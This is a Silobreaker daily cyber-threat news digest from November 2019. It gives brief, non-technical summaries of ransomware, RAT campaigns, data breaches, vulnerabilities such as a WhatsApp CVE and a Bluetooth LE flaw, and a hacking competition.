Silobreaker Daily Cyber Digest – 18 November 2019
NextCloud Linux Servers hit with new NextCry ransomware
- BleepingComputer and security researcher Michael Gillespie analysed a newly spotted malware, named NextCry, which targets NextCloud file sync and share service clients. The malware, is a ‘a Python script compiled in a Linux ELF binary using pyInstaller’ which encodes file names with Base64.
- Gillespie found that the ransomware encrypts data with an AES algorithm with a 256-bit key. The malware code also contains an RSA-2048 public key which is used to encrypt AES-256.
- NextCry, which was not being picked up by any antivirus engines on VirusTotal, does not currently have a decryption key available.
Source (Includes IOCs)
Threat actors pose as Cozy Bear group
- Akamai researchers observed threat actors engaging in distributed denial-of-service (DDoS) extortion campaigns claiming to be the Russian group Cozy Bear, also known as APT29. Cozy Bear are known for targeting commercial entities and government organisations using customised malware. As they have not been previously observed in extortion campaigns, the researchers believe the threat actors are using the name of the well-known group ‘to invoke fear and panic.’
- The campaign involves the threat actors sending extortion letters to targeted companies in which they demand 2 Bitcoin (about $17,500), a price that will rise if the deadline is not met, after which DDoS attacks will also start. The researchers believe a unique wallet is used for each individual victim.
- Similar to a previous campaign by a group pretending to be Fancy Bear, the threat actors engage in ‘small attacks’ lasting about 30 minutes, as proof of their capabilities. Some of the attacks observed by the researchers included ones abusing DNS, Apple Remote Management Service, CLDAP, TFTP, PortMap, and WS-Discovery, across the UDP Protocol.
NetSupport RAT spread via two malware campaigns
- Researchers of the Zscaler ThreatLabZ team observed two individual malware campaigns spreading the commercially available NetSupport RAT via fake update notices injected into compromised content management systems sites. Once installed, NetSupport RAT sends a victim’s information to the attackers’ site, enabling remote access to the compromised device.
- The first campaign injects two malicious redirect scripts into a compromised WordPress site that redirects a user to the malware site and downloads a fake Flash Player update template script. Once a user clicks on the fake update, regardless of whether clicking on ‘Update’ or ‘Later,’ a malicious HTA file is downloaded, which, when executed, will also run PowerShell and download the payload. At least 113,000 unique users have been targeted.
- In the second campaign, the attackers directly inject a fake update template script by exploiting a legitimate site. This time a fake font update is used, with individualised templates depending on the browser a victim uses.
Source (Includes IOCs)
Hacktivists offers bug bounty to other hackers
- Hacktivist Phineas Fisher is offering up to $100,000 in cryptocurrency to other hackers as part of their ‘Hacktivist Bug Hunting Program,’ which is geared towards ‘hacktivists who do public interest hacks.’ Examples given by Phineas Fisher are mining and livestock companies in South America, Israel’s NSO Group, and oil company Halliburton.
- Phineas Fisher is known for hacking multiple companies, including the British-German Gamma Group associated with the spyware FinFisher, Italian company HackingTeam, as well as a Spanish police union, Turkey’s ruling party in 2016, and several banks. The money for the bug bounty is said to have been taken from a more recent, but as yet undisclosed, hack.
Leaks and Breaches
Hacked Disney+ accounts stolen hours after the service launched
- ZDNet reported that Disney+ user accounts are being sold or given away on hacking forums hours after the service launched. The accounts which are being sold are advertised for prices ranging between $3 to $11.
- ZDNet spoke to customers who admitted they reused passwords, while others stated that they used fresh passwords. This would suggest that their devices have been infected with info-stealing or keylogging malware.
Unsecured database exposes Wizards of the Coast customer data
- Researchers at Fidus Information Security discovered an Amazon Web Services database belonging to Wizards of the Coast, which is known for its trading card game Magic: The Gathering. The database was available to the public without password protection since approximately early September 2019. It has since been secured.
- The database exposed the names, email addresses, and passwords of 452,634 players of Magic: The Gathering Arena and Magic: The Gathering Online. An additional 470 email addresses linked to the company’s employees were also exposed. According to TechCrunch, none of the data was encrypted and some accounts date back to at least 2012. A spokesperson for the company stated that the files were from a decommissioned website.
146 vulnerabilities found in pre-installed Android apps and firmware
- Kryptowire researchers found 146 vulnerabilities affecting 29 vendors of Android firmware and apps. The vulnerabilities include 41 System Properties Modification flaws, 24 app installation bugs, and 30 command execution vulnerabilities, as well as flaws in wireless setting modification, audio recording, dynamic code loading, and AT command execution.
- A detailed list of all vulnerabilities and affected products can be accessed on Kryptowire’s website.
Home Office’s Brexit App contains lack of basic protection
- Security researchers at Promon reported that the EU Exit ID Document Check app for Android lacks basic resilience against easily performed attack methods and commonly used tools. The app, which has been downloaded over 1 million times, requires users to provide a range of sensitive information.
- The researchers stated that the app is vulnerable to code being injected while the app is running, fails to notice if it is being used in a hostile environment, fails to use obfuscation, and more. An attacker could exploit these various vulnerabilities to acquire sensitive information, such as passport details, facial scans, photo ID and more.
WhatsApp patch vulnerability that could have allowed installation of Spyware
- WhatsApp patched a vulnerability, tracked as CVE-2019-11931, that impacted consumer and enterprise versions of the messaging service on all major platforms. The flaw could be triggered by an attacker sending a maliciously crafted MP4 file over WhatsApp, which could cause a denial-of-service or remote code execution.
- An attacker could use the attack to install a backdoor or spyware onto the compromised device. This could potentially allow the malicious actor to steal chat messages and files.
- WhatsApp told the The Hacker News that there is no evidence that the vulnerability was exploited in the wild.
Bluetooth device flaw allows attackers to collect user data
- Researchers at The Ohio State University discovered that Bluetooth Low Energy devices contain a design flaw which leaves devices vulnerable when paired with a mobile app, and when operating. The researchers scanned the Google Play Store and found 18,166 Bluetooth Low Energy apps.
- The flaw is related to the universally unique identifier (UUID), which is commonly broadcast in the clear, when devices connect to the mobile app, leaving the devices open to a fingerprinting attack.
- In certain cases the researchers found that they could ‘listen in’ and collect data, this occurred when no encryption is involved or when encryption is used improperly. The researchers believe that the issue is easily resolved, a list of recommendations was passed onto the Bluetooth Special Interest Group.
Growth in malicious lookalike retail domains more than doubles since 2018
- Researchers at Venafi identified over 100,000 lookalike domains which were being used to target the customers of 20 major retailers in the US, UK, France, Germany and Australia.
- The attackers, who were primarily attempting to acquire financial information, used valid TLS certificates. Sixty percent of the malicious domains were using free certificates from Let’s Encrypt. A full breakdown of each country examined in the research is available via Venafi’s blog.
Chinese based Tianfu Cup competitions sees hackers access Edge, Chrome, Safari, and more
- The Chinese equivalent of Pwn2Own, the Tianfu Cup (TFC), has seen Chinese security researchers successfully hack, Microsoft Edge, Google Chrome, Office 365, Safari, Adobe PDF Reader, and more.
- The Tianfu Cup was established after Chinese security researchers were banned by the Chinese government from competing in international hacking events.
The Silobreaker Team
Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.